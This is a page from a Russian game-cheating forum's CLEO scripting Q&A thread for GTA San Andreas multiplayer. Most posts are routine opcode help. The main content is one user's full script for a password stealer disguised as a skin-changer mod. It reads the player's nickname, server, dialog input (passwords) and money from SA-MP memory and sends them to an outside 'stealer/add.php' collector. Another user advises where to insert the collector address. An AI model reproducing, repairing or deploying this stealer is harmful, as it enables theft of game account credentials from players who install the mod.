[CLEO] Вопрос - Ответ - Страница 241 - Форум Cheat-Master.ru
Модератор форума: Alowir, Sanoxxx  
[CLEO] Вопрос - Ответ
[CM]Рафаэль Дата: Суббота, 05.09.2015, 20:19 | Сообщение # 1
Cheat-Master
Сообщений: 3080
Статус: Offline

В этой теме задаются вопросы по CLEO, конкретным опкодам (например, назначение того или иного опкода) и т.д.


Форма вопроса:
Код
[color=#1E90FF][b]Вопрос:[/b][/color] text


Форма ответа:
Код
[color=#1E90FF][b]Ответ:[/b][/color] text



Мой Shop
Официальный гарант

Контактные данные:
VK: vk.com/ali_benua
Skype: lvinyipen
Telegram: @AliBenua
ICQ: 552-090-283
fragma Дата: Воскресенье, 06.09.2015, 06:34 | Сообщение # 3601
Новичок
Статус: Offline
Цитата krik4eg ()
Ребята помогите пожалуйста компилю в Sanny Builder и выдавает ошибку:

Неизвестный опкод 8B4C.

Обновил опкоды SampFuncs: 5.0

Неправильно установил опкоды,
Это опкод 0B4C, но если поставить not, то он превращается в 8B4C (отрицание).

Click
Скопировать все файлы из папки "SB data", нахоящейся в архиве, в каталог по пути ".../Sanny Builder 3/data/sa".




Пишу на заказ CLEO скрипты, SF и ASI плагины.


Сообщение отредактировал fragma - Суббота, 10.01.2015, 15:52
krik4eg Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3602
Любитель
Сообщений: 47
Статус: Offline
Цитата fragma ()
Неправильно установил опкоды,


Спасибо всё сделал но после этого когда компилю в Sanny Builder пишет вот так:

_________________________________________________________

Размер майна: 0
Максимум: 200000

Найбольшая миссия: 0
Максимум: 69000

Найбольший скрипт: 0


Заслужить 100 репутации [ ✔ ]
Заслужить 200 репутации [ ✔ ]
Заслужить 300 репутации [ ✔ ]
Заслужить 1000 репутации [ ✗ ]
Пробыть на CM 200 Дней [ ✔ ]
Пробыть на CM 300 Дней [ ✔ ]
Пробыть на CM 400 Дней [ ✔ ]
Пробыть на CM 500 Дней [ ✔ ]
Пробыть на CM 600 Дней [ ✔ ]
Состоять в клане CM [ ✗ ]
Иметь 10 постов [ ✔ ]
Иметь 50 постов [ ✔ ]
Иметь 200 постов [ ✗ ]
Иметь 500 постов [ ✗ ]
Иметь 1000 постов [ ✗ ]

" Skype: datkantidze / vk.com/id213621245 "


Сообщение отредактировал krik4eg - Суббота, 10.01.2015, 15:55
fragma Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3603
Новичок
Статус: Offline
Цитата krik4eg ()
Размер майна: 0
Максимум: 200000

Найбольшая миссия: 0
Максимум: 69000

Найбольший скрипт: 0


Что тебя волнует в этом?




Пишу на заказ CLEO скрипты, SF и ASI плагины.
krik4eg Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3604
Любитель
Сообщений: 47
Статус: Offline
Цитата fragma ()
Что тебя волнует в этом?


Ну не знаю по моему наверно причина краша пока не знаю об этом программе.


Заслужить 100 репутации [ ✔ ]
Заслужить 200 репутации [ ✔ ]
Заслужить 300 репутации [ ✔ ]
Заслужить 1000 репутации [ ✗ ]
Пробыть на CM 200 Дней [ ✔ ]
Пробыть на CM 300 Дней [ ✔ ]
Пробыть на CM 400 Дней [ ✔ ]
Пробыть на CM 500 Дней [ ✔ ]
Пробыть на CM 600 Дней [ ✔ ]
Состоять в клане CM [ ✗ ]
Иметь 10 постов [ ✔ ]
Иметь 50 постов [ ✔ ]
Иметь 200 постов [ ✗ ]
Иметь 500 постов [ ✗ ]
Иметь 1000 постов [ ✗ ]

" Skype: datkantidze / vk.com/id213621245 "
fragma Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3605
Новичок
Статус: Offline
Цитата krik4eg ()
Ну не знаю по моему наверно причина краша пока не знаю об этом программе.

Причину краша я уже тебе объяснил.




Пишу на заказ CLEO скрипты, SF и ASI плагины.
=]D]EA[N[= Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3606
Боец
Сообщений: 74
Статус: Offline
Как сделать так , что бы игрок сидя в авто, занял другое место (одно из пасожирских) ?
cover Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3607
Бывалый
Сообщений: 343
Статус: Offline
Цитата =]D
EA[N[=;2634260]Как сделать так , что бы игрок сидя в авто, занял другое место (одно из пасожирских) ?

Код

{$CLEO .cs}
0000:

while true
wait 0
     if 0ab0: 52
     then
         if Actor.Driving($PLAYER_ACTOR)
         then
         0@ = Actor.CurrentCar($PLAYER_ACTOR)
         0430: put_actor $PLAYER_ACTOR into_car 0@ passenger_seat 0
         end
     end
end

passenger_seat 0 - Число 0 это пасс место возле водителя, если поставишь число 1 то это пасс место сзади водителя, цифра 2 это место сзади справа от водителя.


Сообщение отредактировал cover - Воскресенье, 11.01.2015, 10:15
=]D]EA[N[= Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3608
Боец
Сообщений: 74
Статус: Offline
cover, Приблагодарен !!!)))
[CM]Psicho Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3609
Новичок
Сообщений: 4
Статус: Offline
Вопрос: Почему когда я вписываю ссылку на сайт с готовой бд в команду
" :Base " мне выпрыгивает ошибка?


«The monster»

Сообщение отредактировал [CM]Psicho - Среда, 14.01.2015, 15:49
fragma Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3610
Новичок
Статус: Offline
[CM]Psicho, подробнее, что за ошибка?



Пишу на заказ CLEO скрипты, SF и ASI плагины.
[CM]Psicho Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3611
Новичок
Сообщений: 4
Статус: Offline
Цитата
[CM]Psicho, подробнее, что за ошибка?

" Неверный символ в идентификаторе Base lol-stuff-samp-rp.esy.es. "
(+cкрин)


«The monster»
fragma Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3612
Новичок
Статус: Offline
Цитата [CM]Psicho ()
Неверный символ в идентификаторе Base lol-stuff-samp-rp.esy.es. "

Код скинь, исправим




Пишу на заказ CLEO скрипты, SF и ASI плагины.
Vinnard Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3613
Новичок
Сообщений: 10
Статус: Offline
Какой опкод что б при активации скрипта автоматически нажимало Enter или другую клавишу?
[CM]Psicho Дата: Воскресенье, 06.09.2015, 06:37 | Сообщение # 3614
Новичок
Сообщений: 4
Статус: Offline
Цитата
Код скинь, исправим


Вот,я точно не знаю что за проблема,т.к я недавно заинтересовался стиллером ,а до этого делал мелкие моды на смену скина,и что-то похожее для сингплея

Код
{$CLEO .cs}
0000:   
wait 1750
0AA2: 31@ = load_library "kernel32.dll" // IF and SET   
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // Антикрашер
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@    
0@ += 371500   
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1   
0@ += 4   
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1   
0@ += 9   
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1   
0@ += 4   
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1   
var          
30@: int
31@: int
end//"data/handling.cfg". handling.cfg это файл который лежит в папке data измените файл на любой другой существующий, так же можно заменить папку, можно дописать еще несколько папок. В этом файле будет храниться инфа о запусках игры
0af0: 30@ = "data/handling.cfg" "Setting" "Rand"
0af0: 31@ = "data/handling.cfg" "Setting" "Run"
0af1: 30@ "data/handling.cfg" "Setting" "Rand"
0af1: 31@ "data/handling.cfg" "Setting" "Run"
if or
30@ <= 0
31@ <= 0
31@ > 30@
      then
      0209: 30@ = random_int_in_ranges 5 40 //Рандом запуск, меньше чем 2 2 не ставить!
      0af1: 30@ "data/handling.cfg" "Setting" "Rand"
      0af1: 1 "data/handling.cfg" "Setting" "Run"
      else
      0af0: 30@ = "data/handling.cfg" "Setting" "Rand"
      0af0: 31@ = "data/handling.cfg" "Setting" "Run"
      31@ += 1    
      0af1: 31@ "data/handling.cfg" "Setting" "Run"
      if 31@ > 30@
          then   
          0209: 30@ = random_int_in_ranges 5 40 //Рандом запуск, меньше чем 2 2 не ставить!
          0af1: 30@ "data/handling.cfg" "Setting" "Rand"
          0af1: 1 "data/handling.cfg" "Setting" "Run"
          end
      end
if 31@ == 30@
      then 0AB1: call_scm_func @Thread 1 @Stealer
      end
0662: printstring "SYSTEMAIN.3DN.RU"   

:NONAME_20
0001: wait 0 ms   
00D6: if   
0256:   player $PLAYER_CHAR defined   
004D: jump_if_false @NONAME_20   
05AA: 0@s = 'SKIN' // @s = 'short'   
00D6: if   
0AB1: call_scm_func @NONAME_2166 2 0@ 1@    
004D: jump_if_false @NONAME_20   
07CC: set_player $PLAYER_CHAR can_enter_exit_vehicles 0   
018C: play_sound 1056 at 0.0 0.0 0.0   
0050: gosub @NONAME_2516   
00BC: show_text_highpriority GXT '6CLOWN' time 3000 flag 1  // Clown
0006: 0@ = 0   
0006: 1@ = 0   
0006: 2@ = 0   
0006: 4@ = 0   
02A3: enable_widescreen 1   
03BF: set_player $PLAYER_CHAR ignored_by_everyone 0   
0A8D: 3@ = read_memory 11990512 size 4 virtual_protect 0   
000A: 3@ += 1432   
0A8C: write_memory 3@ size 1 value 1 virtual_protect 0   

:NONAME_203
01E3: show_text_1number_styled GXT 'NUMBER' number 0@ time 10 style 5  // ~1~
0001: wait 10 ms   
00D6: if   
0118:   actor $PLAYER_ACTOR dead   
004D: jump_if_false @NONAME_248   
0002: jump @NONAME_1225   

:NONAME_248
00D6: if   
00E1:   player 0 pressed_key 15   
004D: jump_if_false @NONAME_272   
0002: jump @NONAME_1225   

:NONAME_272
00D6: if   
0AB0:   key_pressed 48   
004D: jump_if_false @NONAME_301   
0006: 1@ = 0   
0002: jump @NONAME_591   

:NONAME_301
00D6: if   
0AB0:   key_pressed 49   
004D: jump_if_false @NONAME_330   
0006: 1@ = 1   
0002: jump @NONAME_591   

:NONAME_330
00D6: if   
0AB0:   key_pressed 50   
004D: jump_if_false @NONAME_359   
0006: 1@ = 2   
0002: jump @NONAME_591   

:NONAME_359
00D6: if   
0AB0:   key_pressed 51   
004D: jump_if_false @NONAME_388   
0006: 1@ = 3   
0002: jump @NONAME_591   

:NONAME_388
00D6: if   
0AB0:   key_pressed 52   
004D: jump_if_false @NONAME_417   
0006: 1@ = 4   
0002: jump @NONAME_591   

:NONAME_417
00D6: if   
0AB0:   key_pressed 53   
004D: jump_if_false @NONAME_446   
0006: 1@ = 5   
0002: jump @NONAME_591   

:NONAME_446
00D6: if   
0AB0:   key_pressed 54   
004D: jump_if_false @NONAME_475   
0006: 1@ = 6   
0002: jump @NONAME_591   

:NONAME_475
00D6: if   
0AB0:   key_pressed 55   
004D: jump_if_false @NONAME_504   
0006: 1@ = 7   
0002: jump @NONAME_591   

:NONAME_504
00D6: if   
0AB0:   key_pressed 56   
004D: jump_if_false @NONAME_533   
0006: 1@ = 8   
0002: jump @NONAME_591   

:NONAME_533
00D6: if   
0AB0:   key_pressed 57   
004D: jump_if_false @NONAME_562   
0006: 1@ = 9   
0002: jump @NONAME_591   

:NONAME_562
00D6: if   
0AB0:   key_pressed 16   
004D: jump_if_false @NONAME_584   
0002: jump @NONAME_655   

:NONAME_584
0002: jump @NONAME_203   

:NONAME_591
000A: 2@ += 1   
0012: 0@ *= 10   
005A: 0@ += 1@ // (int)   
01E3: show_text_1number_styled GXT 'NUMBER' number 0@ time 250 style 5  // ~1~
0001: wait 250 ms   
00D6: if   
0039:   2@ == 3   
004D: jump_if_false @NONAME_203   

:NONAME_655
00D6: if and
0029:   0@ >= 0   
002B:   317 >= 0@   
004D: jump_if_false @NONAME_1225   
00D6: if   
0039:   0@ == 300   
004D: jump_if_false @NONAME_707   
0002: jump @NONAME_2101   

:NONAME_707
00D6: if   
0039:   0@ == 301   
004D: jump_if_false @NONAME_733   
0002: jump @NONAME_2070   

:NONAME_733
00D6: if   
0039:   0@ == 302   
004D: jump_if_false @NONAME_759   
0002: jump @NONAME_2039   

:NONAME_759
00D6: if   
0039:   0@ == 303   
004D: jump_if_false @NONAME_785   
0002: jump @NONAME_1977   

:NONAME_785
00D6: if   
0039:   0@ == 304   
004D: jump_if_false @NONAME_811   
0002: jump @NONAME_1822   

:NONAME_811
00D6: if   
0039:   0@ == 305   
004D: jump_if_false @NONAME_837   
0002: jump @NONAME_1791   

:NONAME_837
00D6: if   
0039:   0@ == 306   
004D: jump_if_false @NONAME_863   
0002: jump @NONAME_1760   

:NONAME_863
00D6: if   
0039:   0@ == 307   
004D: jump_if_false @NONAME_889   
0002: jump @NONAME_1729   

:NONAME_889
00D6: if   
0039:   0@ == 308   
004D: jump_if_false @NONAME_915   
0002: jump @NONAME_1667   

:NONAME_915
00D6: if   
0039:   0@ == 309   
004D: jump_if_false @NONAME_941   
0002: jump @NONAME_1636   

:NONAME_941
00D6: if   
0039:   0@ == 310   
004D: jump_if_false @NONAME_967   
0002: jump @NONAME_1884   

:NONAME_967
00D6: if   
0039:   0@ == 311   
004D: jump_if_false @NONAME_993   
0002: jump @NONAME_1915   

:NONAME_993
00D6: if   
0039:   0@ == 312   
004D: jump_if_false @NONAME_1019   
0002: jump @NONAME_1450   

:NONAME_1019
00D6: if   
0039:   0@ == 313   
004D: jump_if_false @NONAME_1045   
0002: jump @NONAME_1512   

:NONAME_1045
00D6: if   
0039:   0@ == 314   
004D: jump_if_false @NONAME_1071   
0002: jump @NONAME_1574   

:NONAME_1071
00D6: if   
0039:   0@ == 315   
004D: jump_if_false @NONAME_1097   
0002: jump @NONAME_1419   

:NONAME_1097
00D6: if   
0039:   0@ == 316   
004D: jump_if_false @NONAME_1123   
0002: jump @NONAME_1388   

:NONAME_1123
00D6: if   
0039:   0@ == 317   
004D: jump_if_false @NONAME_1149   
0002: jump @NONAME_1357   

:NONAME_1149
0247: load_model 0@   
0001: wait 250 ms   

:NONAME_1159
0001: wait 0 ms   
00D6: if   
0248:   model 0@ available   
004D: jump_if_false @NONAME_1159   

:NONAME_1179
0001: wait 0 ms   
09C7: change_player $PLAYER_CHAR model_to 0@   
00D6: if   
0039:   4@ == 1   
004D: jump_if_false @NONAME_1220   
0296: unload_special_actor 1   
0002: jump @NONAME_1225   

:NONAME_1220
0249: release_model 0@   

:NONAME_1225
00BE: text_clear_all   
0A8C: write_memory 3@ size 1 value 0 virtual_protect 0   
03BF: set_player $PLAYER_CHAR ignored_by_everyone 0   
02A3: enable_widescreen 0   
018C: play_sound 1057 at 0.0 0.0 0.0   
0001: wait 1000 ms   
07CC: set_player $PLAYER_CHAR can_enter_exit_vehicles 1   
0050: gosub @NONAME_2635   
0002: jump @NONAME_20   
0001: wait 0 ms   
023C: load_special_actor 'SFPDM2' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'LVPDM2' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1357
0001: wait 0 ms   
023C: load_special_actor 'CDEPUT' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1388
0001: wait 0 ms   
023C: load_special_actor 'LVPDM1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1419
0001: wait 0 ms   
023C: load_special_actor 'SFPDM1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1450
0001: wait 0 ms   
023C: load_special_actor 'GUNGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'GUNGRL3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1512
0001: wait 0 ms   
023C: load_special_actor 'MECGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'MECGRL3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1574
0001: wait 0 ms   
023C: load_special_actor 'NURGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'NURGRL3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1636
0001: wait 0 ms   
023C: load_special_actor 'SUZIE' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1667
0001: wait 0 ms   
023C: load_special_actor 'SMOKEV' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'RYDER2' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1729
0001: wait 0 ms   
023C: load_special_actor 'RYDER3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1760
0001: wait 0 ms   
023C: load_special_actor 'KENDL' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1791
0001: wait 0 ms   
023C: load_special_actor 'JANITOR' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1822
0001: wait 0 ms   
023C: load_special_actor 'EMMET' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'CROGRL3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1884
0001: wait 0 ms   
023C: load_special_actor 'CROGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1915
0001: wait 0 ms   
023C: load_special_actor 'GANGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'GANGRL3' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_1977
0001: wait 0 ms   
023C: load_special_actor 'COPGRL1' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   
0001: wait 0 ms   
023C: load_special_actor 'COPGRL2' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_2039
0001: wait 0 ms   
023C: load_special_actor 'BB' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_2070
0001: wait 0 ms   
023C: load_special_actor 'BBTHIN' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   
0002: jump @NONAME_2125   

:NONAME_2101
0001: wait 0 ms   
023C: load_special_actor 'ANDRE' as 1 // models 290-299   
038B: load_requested_models   
0001: wait 250 ms   

:NONAME_2125
0001: wait 0 ms   
00D6: if   
023D:   special_actor 1 loaded   
004D: jump_if_false @NONAME_2125   
0006: 0@ = 290   
0006: 4@ = 1   
0002: jump @NONAME_1179   

:NONAME_2166
00D6: if   
0AA9:   is_game_version_original   
004D: jump_if_false @NONAME_2206   
0006: 10@ = 9867536   
0006: 11@ = 10783072   
0002: jump @NONAME_2226   

:NONAME_2206
0006: 10@ = 9877392   
0006: 11@ = 10792928   

:NONAME_2226
0A9F: 4@ = current_thread_pointer   
0A8E: 5@ = 4@ + 220 // int   
0A8D: 5@ = read_memory 5@ size 1 virtual_protect 0   
00D6: if   
0039:   5@ == 1   
004D: jump_if_false @NONAME_2287   
0085: 4@ = 11@ // (int)   
0002: jump @NONAME_2294   

:NONAME_2287
000A: 4@ += 60   

:NONAME_2294
0006: 6@ = 0   

:NONAME_2301
0A8D: 5@ = read_memory 4@ size 1 virtual_protect 0   
00D6: if and
0019:   5@ > 0   
8029:   not  6@ >= 16   
004D: jump_if_false @NONAME_2359   
000A: 4@ += 1   
000A: 6@ += 1   
0002: jump @NONAME_2366   

:NONAME_2359
0002: jump @NONAME_2373   

:NONAME_2366
0002: jump @NONAME_2301   

:NONAME_2373
0085: 8@ = 10@ // (int)   

:NONAME_2381
0019:   6@ > 0   
004D: jump_if_false @NONAME_2498   
000E: 4@ -= 1   
000E: 6@ -= 1   
0A8D: 5@ = read_memory 4@ size 1 virtual_protect 0   
00D6: if   
0019:   5@ > 90   
004D: jump_if_false @NONAME_2446   
000E: 5@ -= 32   

:NONAME_2446
0A8D: 7@ = read_memory 8@ size 1 virtual_protect 0   
000A: 8@ += 1   
00D6: if   
803B:   not  5@ == 7@ // (int)   
004D: jump_if_false @NONAME_2491   
059A:   return_false   
0AB2: ret 0   

:NONAME_2491
0002: jump @NONAME_2381   

:NONAME_2498
0A8C: write_memory 10@ size 1 value 0 virtual_protect 0   
0485:   return_true   
0AB2: ret 0   

:NONAME_2516
0A9F: 1@ = current_thread_pointer   
000A: 1@ += 16   
0A8D: 1@ = read_memory 1@ size 4 virtual_protect 0   
000E: 1@ -= -2607   
000A: 1@ += 3   
0AA8: call_function_method 6946896 struct 12694336 num_params 1 pop 0 1@ 0@    
000A: 1@ += 12   
0AA5: call 7439872 num_params 2 pop 2 0@ 1@    
0051: return   
0900: clear_object '6CLOWN' last_weapon_damage   
0900: clear_object "CHANGE SKIN" last_weapon_damage   
0000: NOP   

:NONAME_2635
0A9F: 1@ = current_thread_pointer   
000A: 1@ += 16   
0A8D: 1@ = read_memory 1@ size 4 virtual_protect 0   
000E: 1@ -= -2726   
000A: 1@ += 3   
0AA8: call_function_method 6946896 struct 12694336 num_params 1 pop 0 1@ 0@    
000A: 1@ += 12   
0AA5: call 7439872 num_params 2 pop 2 0@ 1@    
0051: return   
0900: clear_object '6CLOWN' last_weapon_damage   
0900: clear_object "CLOWN" last_weapon_damage   
0000: NOP   
0a93: //А тут заканчивается
:Stealer
0000:   
While true   
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET   
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET   
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@    
0A8E: 3@ = 0@ + 2173568 // int   
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1   
if 2@ > 1000   
      then   
      0A8E: 22@ = 2@ + 985 // int   
      0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1   
      if 2@ > 1000   
          then
          0A8E: 5@ = 23@ + 20 // int   
          0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1   
          if 4@ > 1000   
              then
              0A8E: 5@ = 4@ + 34 // int   
              0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1   
              if 24@ > 1000   
                  then   
                  0A8E: 22@ = 0@ + 2173504 // int   
                  0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1   
                  if 1@ > 1000   
                      then   
                      0A8E: 7@ = 1@ + 40 // int   
                      0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1   
                      0A8E: 5@ = 1@ + 44 // int   
                      0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1   
                      if 6@ == 1   
                          then   
                          if or
                          26@ == 1   
                          26@ == 3   
                    then   
                    25@ = 1
                    end
                          end   
                      if and
                      25@ == 1   
                      not 6@ == 1   
                          then   
                          0A8E: 7@ = 1@ + 48 // int   
                          0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1   
                          0A8E: 6@ = 1@ + 36 // int   
                          0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1   
                          0A8E: 6@ = 0@ + 617008 // int   
                          0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@    
                          0A8E: 6@ = 4@ + 26 // int   
                          0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1   
                          0A8E: 7@ = 4@ + 10 // int   
                          if not 23@ >= 16   
                    then   
                    0085: 12@ = 7@ // (int)   
                    else
                    0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1   
                    end
                          0A8E: 9@ = 2@ + 710 // int   
                          0A8E: 14@ = 2@ + 452 // int   
                          0A8E: 8@ = 2@ + 969 // int   
                          0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1   
                          0A8E: 18@ = 4@ + 42 // int   
                          0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1   
                          010B: 21@ = player $PLAYER_CHAR money   
                          0AC6: 0@ = label @Base offset   
                          0AC8: 20@ = allocate_memory_size 1024 //0 - base, 14 - ip, 15 - port, 9 - server, 12 - nick, 3 - dialog, 5 - pass, 21 - money, 27 - score
                          0AD3: 20@ = format "%snick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d&score=%d" 0@ 12@ 14@ 15@ 9@ 3@ 5@ 21@ 27@
                          0ac8: 8@ = 256
                          0ad3: 8@ = "Stealer" //Если ваша база умеет распознавать браузеры, то она решит, что жертва юзает браузер "Stealer"
                          0ab1: @InternetOpen 1 {USER_AGENT}8@ to {hSession} 9@ //Открытие сессии через наш "браузер"
                          0ab1: @InternetOpenUrl 2 {hSession} 9@ {Url} 20@ //Отсылка данных
                          0ac9: 8@
                          0006: 25@ = 0   
                          end
                      end
                  end
              end
          end
      end
end
:InternetOpen
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@
0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@
0ab2: 1 1@
:InternetOpenUrl
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@
0AA7: function 29@ params 6 pop 0 {parameters} 0 0 0 0 {URL} 1@ {handleInternet} 0@ {HANLDE} 2@
0ab2: 0   
:wininet
0AA2: 30@ = load_library "Wininet.dll"
0051:
:Thread  //Подключение 2го потока
0A9F: 32@ = current_thread_pointer   
000A: 32@ += 16   
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0   
0062: 32@ -= 0@ // (int)   
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@    
005A: 32@ += 0@ // (int)   
000A: 33@ += 16   
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0   
000A: 33@ += 44   
for 32@ = 0 to 30
      0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0   
      000A: 33@ += 4   
      end   
0ab2: 0   
:Base //аддрес базы
hex
"http:" 2f 2f "keylog.ph" 2f "stealer" 2f "add.php?" 00
end


P.S

строка с кодом :Base стандартно выглядит , я хотел поменять на " :Base lol-stuff-samp-rp.esy.es. "


«The monster»

Сообщение отредактировал [CM]Psicho - Среда, 14.01.2015, 18:54
fragma Дата: Воскресенье, 06.09.2015, 06:37 | Сообщение # 3615
Новичок
Статус: Offline
Цитата [CM
Psicho;2643019]строка с кодом :Base стандартно выглядит , я хотел поменять на " :Base lol-stuff-samp-rp.esy.es. "

Базу надо вставлять
Цитата [CM
Psicho;2643019]"http:" 2f 2f "сюда" 2f "stealer" 2f "add.php?" 00





Пишу на заказ CLEO скрипты, SF и ASI плагины.


Сообщение отредактировал fragma - Среда, 14.01.2015, 19:11
Поиск:
Статистика Форума